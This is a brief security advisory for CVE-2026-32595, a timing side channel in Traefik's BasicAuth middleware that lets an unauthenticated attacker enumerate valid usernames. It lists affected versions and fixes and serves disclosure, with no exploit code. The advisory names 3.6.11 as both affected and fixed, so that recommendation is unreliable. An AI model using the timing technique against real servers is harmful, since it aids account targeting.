CVE-2026-32595

Name of the Vulnerable Software and Affected Versions Traefik versions 2.11.40 and below Traefik versions 3.0.0-beta1 through 3.6.11 Traefik version 3.7.0-ea.1

Description Traefik’s BasicAuth middleware has a flaw that allows an unauthenticated attacker to enumerate valid usernames through a timing attack. When a valid username is submitted, the middleware performs a bcrypt password comparison, taking approximately 166 milliseconds. If the username is invalid, the response is returned immediately in about 0.6 milliseconds. This approximately 298-times timing difference is observable over the network, enabling an attacker to reliably identify valid usernames.

Recommendations Update to Traefik version 2.11.41 or later. Update to Traefik version 3.6.11 or later. Update to Traefik version 3.7.0-ea.2 or later.